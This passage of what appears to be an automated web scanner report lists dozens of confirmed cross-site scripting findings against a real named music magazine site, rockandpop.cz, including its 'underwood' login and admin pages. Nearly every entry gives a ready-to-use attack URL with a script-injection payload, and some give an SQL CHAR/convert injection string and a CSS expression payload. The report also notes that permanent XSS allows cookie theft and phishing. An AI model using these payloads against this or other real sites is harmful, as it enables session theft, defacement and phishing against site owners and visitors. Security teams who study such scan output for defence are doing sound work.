1261. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1262. Parameter Name: Query Based
1263. Parameter Type: FullQueryString
1264. Attack Pattern: '"--></style></script><script>alert(0x0006F2)</script>
1265.  
1266. Severity: Important
1267. Confirmation: Confirmed
1268. URL: http://www.rockandpop.cz/recenze/pipes-and-pints-found-and-lost/?'"--></style></script><script>alert(0x000711)</script>
1269. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1270. Parameter Name: Query Based
1271. Parameter Type: FullQueryString
1272. Attack Pattern: '"--></style></script><script>alert(0x000711)</script>
1273.  
1274. Severity: Important
1275. Confirmation: Confirmed
1276. URL: http://www.rockandpop.cz/recenze/punk-goes-pop-5/?'"--></style></script><script>alert(0x00070D)</script>
1277. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1278. Parameter Name: Query Based
1279. Parameter Type: FullQueryString
1280. Attack Pattern: '"--></style></script><script>alert(0x00070D)</script>
1281.  
1282. Severity: Important
1283. Confirmation: Confirmed
1284. Detection Accuracy :
1285. URL: http://www.rockandpop.cz/recenze/?page='"--></style></script><script>alert(0x000719)</script>
1286. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1287. Parameter Name: page
1288. Parameter Type: Querystring
1289. Attack Pattern: '"--></style></script><script>alert(0x000719)</script>
1290.  
1291. Severity: Important
1292. Confirmation: Confirmed
1293. Detection Accuracy :
1294. URL: http://www.rockandpop.cz/recenze/please-the-trees-a-forest-affair/?'"--></style></script><script>alert(0x00072D)</script>
1295. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1296. Parameter Name: Query Based
1297. Parameter Type: FullQueryString
1298. Attack Pattern: '"--></style></script><script>alert(0x00072D)</script>
1299.  
1300. Severity: Important
1301. Confirmation: Confirmed
1302. URL: http://www.rockandpop.cz/recenze/devil-sold-his-soul-empire-of-light/?'"--></style></script><script>alert(0x000732)</script>
1303. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1304. Parameter Name: Query Based
1305. Parameter Type: FullQueryString
1306. Attack Pattern: '"--></style></script><script>alert(0x000732)</script>
1307.  
1308. Severity: Important
1309. Confirmation: Confirmed
1310. URL: http://www.rockandpop.cz/recenze/yellowcard-southern-air/?'"--></style></script><script>alert(0x000746)</script>
1311. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1312. Parameter Name: Query Based
1313. Parameter Type: FullQueryString
1314. Attack Pattern: '"--></style></script><script>alert(0x000746)</script>
1315.  
1316. Severity: Important
1317. Confirmation: Confirmed
1318. URL: http://www.rockandpop.cz/recenze/whitechapel-whitechapel/?'"--></style></script><script>alert(0x000747)</script>
1319. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1320. Parameter Name: Query Based
1321. Parameter Type: FullQueryString
1322. Attack Pattern: '"--></style></script><script>alert(0x000747)</script>
1323.  
1324. Severity: Important
1325. Confirmation: Confirmed
1326. Detection Accuracy :
1327. URL: http://www.rockandpop.cz/recenze/dvd/?'"--></style></script><script>alert(0x000765)</script>
1328. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1329. Parameter Name: Query Based
1330. Parameter Type: FullQueryString
1331. Attack Pattern: '"--></style></script><script>alert(0x000765)</script>
1332.  
1333. Severity: Important
1334. Confirmation: Confirmed
1335. Detection Accuracy :
1336. URL: http://www.rockandpop.cz/recenze/hledani/?'"--></style></script><script>alert(0x00078E)</script>
1337. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1338. Parameter Name: Query Based
1339. Parameter Type: FullQueryString
1340. Attack Pattern: '"--></style></script><script>alert(0x00078E)</script>
1341.  
1342. Severity: Important
1343. Confirmation: Confirmed
1344. URL: http://www.rockandpop.cz/stitky/autori/?'"--></style></script><script>alert(0x00079A)</script>
1345. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1346. Parameter Name: Query Based
1347. Parameter Type: FullQueryString
1348. Attack Pattern: '"--></style></script><script>alert(0x00079A)</script>
1349.  
1350. Severity: Important
1351. Confirmation: Confirmed
1352. URL: http://www.rockandpop.cz/live/cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x00079C)</script>
1353. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1354. Parameter Name: Query Based
1355. Parameter Type: FullQueryString
1356. Attack Pattern: '"--></style></script><script>alert(0x00079C)</script>
1357.  
1358. Severity: Important
1359. Confirmation: Confirmed
1360. URL: http://www.rockandpop.cz/stitky/?'"--></style></script><script>alert(0x0007A6)</script>
1361. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1362. Parameter Name: Query Based
1363. Parameter Type: FullQueryString
1364. Attack Pattern: '"--></style></script><script>alert(0x0007A6)</script>
1365.  
1366. Severity: Important
1367. Confirmation: Confirmed
1368. URL: http://www.rockandpop.cz/stitky/autori/ondrej-platzer/?'"--></style></script><script>alert(0x0007B2)</script>
1369. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1370. Parameter Name: Query Based
1371. Parameter Type: FullQueryString
1372. Attack Pattern: '"--></style></script><script>alert(0x0007B2)</script>
1373.  
1374. Severity: Important
1375. Confirmation: Confirmed
1376. URL: http://www.rockandpop.cz/live/asking-alexandria-while-she-sleeps-motionless-in-white-betraying-the-martyrs-roxy-praha/?'"--></style></script><script>alert(0x0007D4)</script>
1377. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1378. Parameter Name: Query Based
1379. Parameter Type: FullQueryString
1380. Attack Pattern: '"--></style></script><script>alert(0x0007D4)</script>
1381.  
1382. Severity: Important
1383. Confirmation: Confirmed
1384. URL: http://www.rockandpop.cz/live/beneficni-koncert-pro-zvirata-v-nouzi-vol-2-plzen-divadlo-pod-lampou/?'"--></style></script><script>alert(0x00081E)</script>
1385. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1386. Parameter Name: Query Based
1387. Parameter Type: FullQueryString
1388. Attack Pattern: '"--></style></script><script>alert(0x00081E)</script>
1389.  
1390. Severity: Important
1391. Confirmation: Confirmed
1392. URL: http://www.rockandpop.cz/live/parkway-drive-emmure-the-word-alive-structures-meet-factory-praha/?'"--></style></script><script>alert(0x00081F)</script>
1393. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1394. Parameter Name: Query Based
1395. Parameter Type: FullQueryString
1396. Attack Pattern: '"--></style></script><script>alert(0x00081F)</script>
1397.  
1398. Severity: Important
1399. Confirmation: Confirmed
1400. URL: http://www.rockandpop.cz/live/?page='"--></style></script><script>alert(0x000825)</script>
1401. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1402. Parameter Name: page
1403. Parameter Type: Querystring
1404. Attack Pattern: '"--></style></script><script>alert(0x000825)</script>
1405.  
1406. Severity: Important
1407. Confirmation: Confirmed
1408. URL: http://www.rockandpop.cz/live/sunshine-rozpoutali-v-plzni-hotovy-karmageddon/?'"--></style></script><script>alert(0x00082F)</script>
1409. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1410. Parameter Name: Query Based
1411. Parameter Type: FullQueryString
1412. Attack Pattern: '"--></style></script><script>alert(0x00082F)</script>
1413.  
1414. Severity: Important
1415. Confirmation: Confirmed
1416. URL: http://www.rockandpop.cz/live/seal-rozvasnil-karlovarskou-kv-arenu/?'"--></style></script><script>alert(0x00082A)</script>
1417. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1418. Parameter Name: Query Based
1419. Parameter Type: FullQueryString
1420. Attack Pattern: '"--></style></script><script>alert(0x00082A)</script>
1421.  
1422. Severity: Important
1423. Confirmation: Confirmed
1424. Detection Accuracy :
1425. URL: http://www.rockandpop.cz/live/muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000831)</script>
1426. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1427. Parameter Name: Query Based
1428. Parameter Type: FullQueryString
1429. Attack Pattern: '"--></style></script><script>alert(0x000831)</script>
1430.  
1431. Severity: Important
1432. Confirmation: Confirmed
1433. Detection Accuracy :
1434. URL: http://www.rockandpop.cz/live/into-darkness-tour-2012-17-11-masters-of-rock-cafe-zlin/?'"--></style></script><script>alert(0x000835)</script>
1435. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1436. Parameter Name: Query Based
1437. Parameter Type: FullQueryString
1438. Attack Pattern: '"--></style></script><script>alert(0x000835)</script>
1439.  
1440. Severity: Important
1441. Confirmation: Confirmed
1442. URL: http://www.rockandpop.cz/live/tribal-theory-pokrtili-v-andelu-debutove-album/?'"--></style></script><script>alert(0x000847)</script>
1443. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1444. Parameter Name: Query Based
1445. Parameter Type: FullQueryString
1446. Attack Pattern: '"--></style></script><script>alert(0x000847)</script>
1447.  
1448. Severity: Important
1449. Confirmation: Confirmed
1450. Detection Accuracy :
1451. URL: http://www.rockandpop.cz/live/pipes-and-pints-pokrtili-novinku/?'"--></style></script><script>alert(0x000848)</script>
1452. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1453. Parameter Name: Query Based
1454. Parameter Type: FullQueryString
1455. Attack Pattern: '"--></style></script><script>alert(0x000848)</script>
1456.  
1457. Severity: Important
1458. Confirmation: Confirmed
1459. Detection Accuracy :
1460. URL: http://www.rockandpop.cz/live/co-kdy-kde/?'"--></style></script><script>alert(0x00088F)</script>
1461. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1462. Parameter Name: Query Based
1463. Parameter Type: FullQueryString
1464. Attack Pattern: '"--></style></script><script>alert(0x00088F)</script>
1465.  
1466. Severity: Important
1467. Confirmation: Confirmed
1468. Detection Accuracy :
1469. URL: http://www.rockandpop.cz/live/hledani/?'"--></style></script><script>alert(0x0008B3)</script>
1470. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1471. Parameter Name: Query Based
1472. Parameter Type: FullQueryString
1473. Attack Pattern: '"--></style></script><script>alert(0x0008B3)</script>
1474.  
1475. Severity: Important
1476. Confirmation: Confirmed
1477. Detection Accuracy :
1478. URL: http://www.rockandpop.cz/clanky/daniela-safarikova-2k12/?'"--></style></script><script>alert(0x0008B4)</script>
1479. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1480. Parameter Name: Query Based
1481. Parameter Type: FullQueryString
1482. Attack Pattern: '"--></style></script><script>alert(0x0008B4)</script>
1483.  
1484. Severity: Important
1485. Confirmation: Confirmed
1486. Detection Accuracy :
1487. URL: http://www.rockandpop.cz/clanky/while-she-sleeps:-nase-jmeno-pochazi-od-chlapka-ktery-prisel-o-svou-chloubu/?'"--></style></script><script>alert(0x0008B6)</script>
1488. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1489. Parameter Name: Query Based
1490. Parameter Type: FullQueryString
1491. Attack Pattern: '"--></style></script><script>alert(0x0008B6)</script>
1492.  
1493. Severity: Important
1494. Confirmation: Confirmed
1495. Detection Accuracy :
1496. URL: http://www.rockandpop.cz/clanky/tomas-franta-2k12/?'"--></style></script><script>alert(0x0008C0)</script>
1497. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1498. Parameter Name: Query Based
1499. Parameter Type: FullQueryString
1500. Attack Pattern: '"--></style></script><script>alert(0x0008C0)</script>
1501.  
1502. Severity: Important
1503. Confirmation: Confirmed
1504. Detection Accuracy :
1505. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-nylon-jail/?'"--></style></script><script>alert(0x0008B7)</script>
1506. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1507. Parameter Name: Query Based
1508. Parameter Type: FullQueryString
1509. Attack Pattern: '"--></style></script><script>alert(0x0008B7)</script>
1510.  
1511. Severity: Important
1512. Confirmation: Confirmed
1513. Detection Accuracy :
1514. URL: http://www.rockandpop.cz/clanky/jirka-mohl-2k12/?'"--></style></script><script>alert(0x0008C5)</script>
1515. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1516. Parameter Name: Query Based
1517. Parameter Type: FullQueryString
1518. Attack Pattern: '"--></style></script><script>alert(0x0008C5)</script>
1519.  
1520.  
1521. Severity: Important
1522. Confirmation: Confirmed
1523. Detection Accuracy :
1524. URL: http://www.rockandpop.cz/clanky/?page='"--></style></script><script>alert(0x0008C9)</script>
1525. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1526. Parameter Name: page
1527. Parameter Type: Querystring
1528. Attack Pattern: '"--></style></script><script>alert(0x0008C9)</script>
1529.  
1530. Severity: Important
1531. Confirmation: Confirmed
1532. Detection Accuracy :
1533. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-ille/?'"--></style></script><script>alert(0x0008F5)</script>
1534. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1535. Parameter Name: Query Based
1536. Parameter Type: FullQueryString
1537. Attack Pattern: '"--></style></script><script>alert(0x0008F5)</script>
1538.  
1539. Severity: Important
1540. Confirmation: Confirmed
1541. Detection Accuracy :
1542. URL: http://www.rockandpop.cz/clanky/top-15-apokalyptickych-pisni/?'"--></style></script><script>alert(0x000918)</script>
1543. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1544. Parameter Name: Query Based
1545. Parameter Type: FullQueryString
1546. Attack Pattern: '"--></style></script><script>alert(0x000918)</script>
1547.  
1548. Severity: Important
1549. Confirmation: Confirmed
1550. Detection Accuracy :
1551. URL: http://www.rockandpop.cz/clanky/usi:-jak-to-slysi/?'"--></style></script><script>alert(0x00092D)</script>
1552. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1553. Parameter Name: Query Based
1554. Parameter Type: FullQueryString
1555. Attack Pattern: '"--></style></script><script>alert(0x00092D)</script>
1556.  
1557. Severity: Important
1558. Confirmation: Confirmed
1559. Detection Accuracy :
1560. URL: http://www.rockandpop.cz/clanky/hledani/?'"--></style></script><script>alert(0x000942)</script>
1561. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1562. Parameter Name: Query Based
1563. Parameter Type: FullQueryString
1564. Attack Pattern: '"--></style></script><script>alert(0x000942)</script>
1565.  
1566. Severity: Important
1567. Confirmation: Confirmed
1568. Detection Accuracy :
1569. URL: http://www.rockandpop.cz/casopis/rock-pop-1-13/?'"--></style></script><script>alert(0x00096C)</script>
1570. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1571. Parameter Name: Query Based
1572. Parameter Type: FullQueryString
1573. Attack Pattern: '"--></style></script><script>alert(0x00096C)</script>
1574.  
1575. Severity: Important
1576. Confirmation: Confirmed
1577. Detection Accuracy :
1578. URL: http://www.rockandpop.cz/casopis/rock-pop-11-12/?'"--></style></script><script>alert(0x000985)</script>
1579. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1580. Parameter Name: Query Based
1581. Parameter Type: FullQueryString
1582. Attack Pattern: '"--></style></script><script>alert(0x000985)</script>
1583.  
1584. Severity: Important
1585. Confirmation: Confirmed
1586. Detection Accuracy :
1587. URL: http://www.rockandpop.cz/casopis/rock-pop-10-12/?'"--></style></script><script>alert(0x00098F)</script>
1588. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1589. Parameter Name: Query Based
1590. Parameter Type: FullQueryString
1591. Attack Pattern: '"--></style></script><script>alert(0x00098F)</script>
1592.  
1593. Severity: Important
1594. Confirmation: Confirmed
1595. Detection Accuracy :
1596. URL: http://www.rockandpop.cz/casopis/?page='"--></style></script><script>alert(0x000992)</script>
1597. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1598. Parameter Name: page
1599. Parameter Type: Querystring
1600. Attack Pattern: '"--></style></script><script>alert(0x000992)</script>
1601.  
1602. Severity: Important
1603. Confirmation: Confirmed
1604. Detection Accuracy :
1605. URL: http://www.rockandpop.cz/casopis/rock-pop-9-12/?'"--></style></script><script>alert(0x0009A4)</script>
1606. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1607. Parameter Name: Query Based
1608. Parameter Type: FullQueryString
1609. Attack Pattern: '"--></style></script><script>alert(0x0009A4)</script>
1610.  
1611. Severity: Important
1612. Confirmation: Confirmed
1613. Detection Accuracy :
1614. URL: http://www.rockandpop.cz/casopis/rock-pop-8-12/?'"--></style></script><script>alert(0x0009AA)</script>
1615. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1616. Parameter Name: Query Based
1617. Parameter Type: FullQueryString
1618. Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
1619.  
1620. Severity: Important
1621. Confirmation: Confirmed
1622. Detection Accuracy :
1623. URL: http://www.rockandpop.cz/casopis/rock-pop-7-12/?'"--></style></script><script>alert(0x0009AE)</script>
1624. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1625. Parameter Name: Query Based
1626. Parameter Type: FullQueryString
1627. Attack Pattern: '"--></style></script><script>alert(0x0009AE)</script>
1628.  
1629. Severity: Important
1630. Confirmation: Confirmed
1631. Detection Accuracy :
1632. URL: http://www.rockandpop.cz/casopis/rock-pop-6-12/?'"--></style></script><script>alert(0x0009F4)</script>
1633. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1634. Parameter Name: Query Based
1635. Parameter Type: FullQueryString
1636. Attack Pattern: '"--></style></script><script>alert(0x0009F4)</script>
1637.  
1638. Severity: Important
1639. Confirmation: Confirmed
1640. Detection Accuracy :
1641. URL: http://www.rockandpop.cz/casopis/5-12/?'"--></style></script><script>alert(0x0009FB)</script>
1642. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1643. Parameter Name: Query Based
1644. Parameter Type: FullQueryString
1645. Attack Pattern: '"--></style></script><script>alert(0x0009FB)</script>
1646.  
1647. Severity: Important
1648. Confirmation: Confirmed
1649. Detection Accuracy :
1650. URL: http://www.rockandpop.cz/casopis/uvodnik/?'"--></style></script><script>alert(0x000A0C)</script>
1651. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1652. Parameter Name: Query Based
1653. Parameter Type: FullQueryString
1654. Attack Pattern: '"--></style></script><script>alert(0x000A0C)</script>
1655.  
1656. Severity: Important
1657. Confirmation: Confirmed
1658. Detection Accuracy :
1659. URL: http://www.rockandpop.cz/casopis/rozhovory/?'"--></style></script><script>alert(0x000A1E)</script>
1660. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1661. Parameter Name: Query Based
1662. Parameter Type: FullQueryString
1663. Attack Pattern: '"--></style></script><script>alert(0x000A1E)</script>
1664.  
1665. Severity: Important
1666. Confirmation: Confirmed
1667. Detection Accuracy :
1668. URL: http://www.rockandpop.cz/casopis/recenze/?'"--></style></script><script>alert(0x000A20)</script>
1669. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1670. Parameter Name: Query Based
1671. Parameter Type: FullQueryString
1672. Attack Pattern: '"--></style></script><script>alert(0x000A20)</script>
1673.  
1674. Severity: Important
1675. Confirmation: Confirmed
1676. Detection Accuracy :
1677. URL: http://www.rockandpop.cz/casopis/elektronicky-casopis/?'"--></style></script><script>alert(0x000A23)</script>
1678. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1679. Parameter Name: Query Based
1680. Parameter Type: FullQueryString
1681. Attack Pattern: '"--></style></script><script>alert(0x000A23)</script>
1682.  
1683. Severity: Important
1684. Confirmation: Confirmed
1685. Detection Accuracy :
1686. URL: http://www.rockandpop.cz/zpravy/zahranicni/?page='"--></style></script><script>alert(0x000A26)</script>
1687. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1688. Parameter Name: page
1689. Parameter Type: Querystring
1690. Attack Pattern: '"--></style></script><script>alert(0x000A26)</script>
1691.  
1692. Confirmation: Confirmed
1693. Detection Accuracy :
1694. URL: http://www.rockandpop.cz/casopis/prodejni-mista/?'"--></style></script><script>alert(0x000A2C)</script>
1695. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1696. Parameter Name: Query Based
1697. Parameter Type: FullQueryString
1698. Attack Pattern: '"--></style></script><script>alert(0x000A2C)</script>
1699.  
1700. Severity: Important
1701. Confirmation: Confirmed
1702. Detection Accuracy :
1703. URL: http://www.rockandpop.cz/casopis/hledani/?'"--></style></script><script>alert(0x000A42)</script>
1704. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1705. Parameter Name: Query Based
1706. Parameter Type: FullQueryString
1707. Attack Pattern: '"--></style></script><script>alert(0x000A42)</script>
1708.  
1709. Severity: Important
1710. Confirmation: Confirmed
1711. Detection Accuracy :
1712. URL: http://www.rockandpop.cz/casopis/vydavatel/?'"--></style></script><script>alert(0x000A39)</script>
1713. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1714. Parameter Name: Query Based
1715. Parameter Type: FullQueryString
1716. Attack Pattern: '"--></style></script><script>alert(0x000A39)</script>
1717.  
1718. Severity: Important
1719. Confirmation: Confirmed
1720. Detection Accuracy :
1721. URL: http://www.rockandpop.cz/video/kuriozity/skryva-se-cobain-v-jizni-americe/?'"--></style></script><script>alert(0x000AAA)</script>
1722. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1723. Parameter Name: Query Based
1724. Parameter Type: FullQueryString
1725. Attack Pattern: '"--></style></script><script>alert(0x000AAA)</script>
1726.  
1727. Severity: Important
1728. Confirmation: Confirmed
1729. Detection Accuracy :
1730. URL: http://www.rockandpop.cz/video/videoklipy/?'"--></style></script><script>alert(0x000ABE)</script>
1731. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1732. Parameter Name: Query Based
1733. Parameter Type: FullQueryString
1734. Attack Pattern: '"--></style></script><script>alert(0x000ABE)</script>
1735.  
1736. Severity: Important
1737. Confirmation: Confirmed
1738. Detection Accuracy :
1739. URL: http://www.rockandpop.cz/video/videoklipy/a-banquet-climb-the-hill/?'"--></style></script><script>alert(0x000B08)</script>
1740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1741. Parameter Name: Query Based
1742. Parameter Type: FullQueryString
1743. Attack Pattern: '"--></style></script><script>alert(0x000B08)</script>
1744.  
1745. Severity: Important
1746. Confirmation: Confirmed
1747. Detection Accuracy :
1748. URL: http://www.rockandpop.cz/video/videoklipy/pure-love-beach-of-diamonds/?'"--></style></script><script>alert(0x000B12)</script>
1749. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1750. Parameter Name: Query Based
1751. Parameter Type: FullQueryString
1752. Attack Pattern: '"--></style></script><script>alert(0x000B12)</script>
1753.  
1754. Severity: Important
1755. Confirmation: Confirmed
1756. Detection Accuracy :
1757. URL: http://www.rockandpop.cz/video/videoklipy/rihanna-diamonds/?'"--></style></script><script>alert(0x000B46)</script>
1758. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1759. Parameter Name: Query Based
1760. Parameter Type: FullQueryString
1761. Attack Pattern: '"--></style></script><script>alert(0x000B46)</script>
1762.  
1763. Severity: Important
1764. Confirmation: Confirmed
1765. Detection Accuracy :
1766. URL: http://www.rockandpop.cz/video/videoklipy/kieslowski-kratka-pisen-o-zabijeni/?'"--></style></script><script>alert(0x000B57)</script>
1767. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1768. Parameter Name: Query Based
1769. Parameter Type: FullQueryString
1770. Attack Pattern: '"--></style></script><script>alert(0x000B57)</script>
1771.  
1772. Severity: Important
1773. Confirmation: Confirmed
1774. Detection Accuracy :
1775. URL: http://www.rockandpop.cz/video/videoklipy/bjork-mutual-core/?'"--></style></script><script>alert(0x000B5A)</script>
1776. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1777. Parameter Name: Query Based
1778. Parameter Type: FullQueryString
1779. Attack Pattern: '"--></style></script><script>alert(0x000B5A)</script>
1780.  
1781. Severity: Important
1782. Confirmation: Confirmed
1783. Detection Accuracy :
1784. URL: http://www.rockandpop.cz/video/videoklipy/sufjan-stevens-silver-gold/?'"--></style></script><script>alert(0x000B6F)</script>
1785. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1786. Parameter Name: Query Based
1787. Parameter Type: FullQueryString
1788. Attack Pattern: '"--></style></script><script>alert(0x000B6F)</script>
1789.  
1790. Severity: Important
1791. Confirmation: Confirmed
1792. Detection Accuracy :
1793. URL: http://www.rockandpop.cz/video/videoklipy/the-tigger-lillies-living-hell/?'"--></style></script><script>alert(0x000B99)</script>
1794. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1795. Parameter Name: Query Based
1796. Parameter Type: FullQueryString
1797. Attack Pattern: '"--></style></script><script>alert(0x000B99)</script>
1798.  
1799. ||| Permanent XSS (Cross-site Scripting)
1800.  
1801. Severity: Important
1802. Confirmation: Confirmed
1803. URL: http://www.rockandpop.cz/underwood/login.php?request='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&uwLanguage=cz
1804. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1805. Injection URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage=cz%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000714)%3C%2Fscript%3E
1806. Parameter Name: request
1807. Parameter Type: Querystring
1808. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
1809.  
1810. Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
1811. User session sensitive information such as cookies can be stolen.
1812. XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
1813. The website can be redirected to a new location, defaced or used as a phishing site.
1814.  
1815. ||| [Possible] Cross-site Scripting
1816.  
1817. Severity : Medium
1818. Confirmation: Confirmed
1819. URL: http://www.rockandpop.cz/underwood/?'"--></style></script><script>alert(0x0000BE)</script>
1820. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1821. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
1822. Parameter Name: Query Based
1823. Parameter Type: FullQueryString
1824. Attack Pattern: '"--></style></script><script>netsparker(0x0000BE)</script>
1825.  
1826. Severity : Medium
1827. Confirmation: Confirmed
1828. URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage='"--></style></script><script>alert(0x0006FB)</script>
1829. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1830. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
1831. Parameter Name: uwLanguage
1832. Parameter Type: Querystring
1833. Attack Pattern: '"--></style></script><script>netsparker(0x0006FB)</script>
1834.  
1835. Severity : Medium
1836. Confirmation: Confirmed
1837. URL: http://www.rockandpop.cz/underwood/index.php/" stYle="x:expre/**/ssion(alert(9))
1838. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1839. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
1840. Parameter Name: URI-BASED
1841. Parameter Type: RawUrlInjection
1842. Attack Pattern: /" stYle="x:expre/**/ssion(netsparker(9))
1843.  
1844.  
1845. Severity : Medium
1846. Confirmation: Confirmed
1847. Detection Accuracy :
1848. URL: http://www.rockandpop.cz/underwood/index.php?'"--></style></script><script>alert(0x0007EA)</script>
1849. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1850. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
1851. Parameter Name: Query Based
1852. Parameter Type: FullQueryString
1853. Attack Pattern: '"--></style></script><script>netsparker(0x0007EA)</script>
1854.  
1855. ||| Forbidden Resource
1856.  
1857. Summary
1858. Severity : Information
1859. Confirmation: Confirmed
1860. URL:
1861.  
1862. http://www.rockandpop.cz/js/swfupload/
1863. http://www.rockandpop.cz/img/
1864. http://www.rockandpop.cz/js/
